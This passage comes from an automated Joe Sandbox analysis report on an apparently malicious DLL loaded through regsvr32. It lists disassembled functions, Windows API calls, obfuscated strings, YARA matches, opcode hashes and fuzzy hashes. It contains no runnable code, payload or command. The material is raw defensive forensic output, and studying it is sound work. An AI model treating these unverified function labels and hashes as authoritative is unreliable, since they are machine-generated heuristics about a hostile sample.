                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                    • String ID: Norwegian-Nynorsk
                                                                    • API String ID: 2273835618-461349085
                                                                    • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                    • Instruction ID: 022a858950a919205c0d5e14b3eef94f33e90cd5aad6ac9d5fcc6b5096194e80
                                                                    • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                    • Instruction Fuzzy Hash: 6C616362A0874286FB749F21F46A3792790EF48BC4F0841B6DA6DC62D4DF7CE948C395
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BB5CC Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FormatTime$__ascii_stricmpfree
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 2252689280-3206640213
                                                                    • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                    • Instruction ID: 90d34fa1669d2016d8456f6d07e0629822ccadd0427fdf7777da2f12b07249d1
                                                                    • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                    • Instruction Fuzzy Hash: 5BF1D32291879285E7748F24B47E97C67A1FB067C4F5490B6EAADC7AC5DE3CA84CC301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B6F0C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B6FCF
                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B70DB
                                                                    • WriteFile.KERNEL32 ref: 00007FF8CA9B7115
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: File$HandleModuleNameWrite
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 3784150691-4022980321
                                                                    • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                    • Instruction ID: 9ed83278d85365a38664fe785b1cf37550ca2e48b587d900000d5265e8eee0be
                                                                    • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                    • Instruction Fuzzy Hash: C251A925A18B4241FB34DF25B97F7BA2251AF857C8F4046B6DA2DC6AD6DF3CE10D8210
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B20E0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3778485334-0
                                                                    • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                    • Instruction ID: fa7479ab49416c6b742ba723fac1dd27d007e73a1d69db945fc0a40fbd939531
                                                                    • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                    • Instruction Fuzzy Hash: AF31B135908F4295EB50DF55F8AA3A973A0FB84788F5000B6DAAD82765EF7CE08CC701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BE6C0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FF8CA9BE6EB
                                                                    • free.LIBCMT ref: 00007FF8CA9BE7E2
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • ___lc_codepage_func.LIBCMT ref: 00007FF8CA9BE76B
                                                                      • Part of subcall function 00007FF8CA9B6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CA9B658F
                                                                      • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
                                                                      • Part of subcall function 00007FF8CA9B6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6637
                                                                      • Part of subcall function 00007FF8CA9B6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6642
                                                                      • Part of subcall function 00007FF8CA9B6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CA9B6658
                                                                      • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                    • String ID:
                                                                    • API String ID: 178205154-0
                                                                    • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                    • Instruction ID: 2e71a6978c7c1703c574a5cea591d2418778aace61b053151074dd52d01e8042
                                                                    • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                    • Instruction Fuzzy Hash: C4D1C532A0878289E7309F25B4AA77936A9BF857C0F404175DAADD7795CF3CE8598700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BDF98 Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BDFF2
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE004
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE04F
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE0E1
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE11B
                                                                    • free.LIBCMT ref: 00007FF8CA9BE12F
                                                                      • Part of subcall function 00007FF8CA9B6C34: _FF_MSGBANNER.LIBCMT ref: 00007FF8CA9B6C64
                                                                      • Part of subcall function 00007FF8CA9B6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3), ref: 00007FF8CA9B6C89
                                                                      • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CAD
                                                                      • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CB8
                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8CA9BE1C2), ref: 00007FF8CA9BE145
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                    • String ID:
                                                                    • API String ID: 2309262205-0
                                                                    • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                    • Instruction ID: dfc63478149f750bdacd88dde3e70283c1c5f3a7f7490d3d0aed734df49038dc
                                                                    • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                    • Instruction Fuzzy Hash: 3C519632A0874296E7709F11B86A27973A5FB447E8F544575DA3E83BD4DF7CE8488300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BFCA0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointer_lock
                                                                    • String ID:
                                                                    • API String ID: 2175075375-0
                                                                    • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                    • Instruction ID: 4624b28f60439714c100013eda3efe5623b8d99d434d7b22c7dd7ffa13253b30
                                                                    • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                    • Instruction Fuzzy Hash: 12318122B0875242FB35AE61B46B7BA6291AF847C4F048574DF5D8BB86DF3CE4198700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B6550 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                    • String ID:
                                                                    • API String ID: 1269745586-0
                                                                    • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                    • Instruction ID: 50636111c6ddb9e6d9aa2f61d5725264bf9171ddeed043406e211fdd10d4c586
                                                                    • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                    • Instruction Fuzzy Hash: E3311E72608B8692DB24DF54F4593AAB3A0FB88788F500176DB9D83A59EF7CD149CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC16C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                    • Instruction ID: beff37bc8d48c0490f1ff2d17a44a2b995b2b12f29dd59ce9c807abbf072178b
                                                                    • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                    • Instruction Fuzzy Hash: 32215021B08B4791FB30DF20F86A2B963A0EF487C8F444170DA5DD76A5EE2CE909C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180003598 Relevance: 8.2, Strings: 6, Instructions: 720COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1h$I-$IY$QL&$li7$o
                                                                    • API String ID: 0-890095520
                                                                    • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                    • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                    • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                    • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000AC48 Relevance: 8.0, Strings: 6, Instructions: 548COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1$ {,$"$$-%$Rku$ i
                                                                    • API String ID: 0-1845893065
                                                                    • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                    • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                    • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                    • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180029B28 Relevance: 8.0, Strings: 6, Instructions: 535COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUS/$YV~$p$@$EX$OX
                                                                    • API String ID: 0-2743166816
                                                                    • Opcode ID: 42abff069bb8dd677487b4024391c19b5d6520d96b7057ef658f077a6ca5f53c
                                                                    • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                    • Opcode Fuzzy Hash: 42abff069bb8dd677487b4024391c19b5d6520d96b7057ef658f077a6ca5f53c
                                                                    • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B4558 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                    • Instruction ID: 9da79ff98522439bb7562fecb9935ab6a93af8ada3dbb2f5f55ab821f4bccab0
                                                                    • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                    • Instruction Fuzzy Hash: 61018421A29F0186EB50DF21F8A93656360FB49BD4F846670DF6E877A4DE3CD89D8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: 5b73a1a625f2cfc86355e0bd41939d36f11956a340da434ded1f42b2c003968d
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: 5b73a1a625f2cfc86355e0bd41939d36f11956a340da434ded1f42b2c003968d
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: bdc050f96bf44494249bd4848307985b7cf3b13daba02c673abc667a99b0703a
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: bdc050f96bf44494249bd4848307985b7cf3b13daba02c673abc667a99b0703a
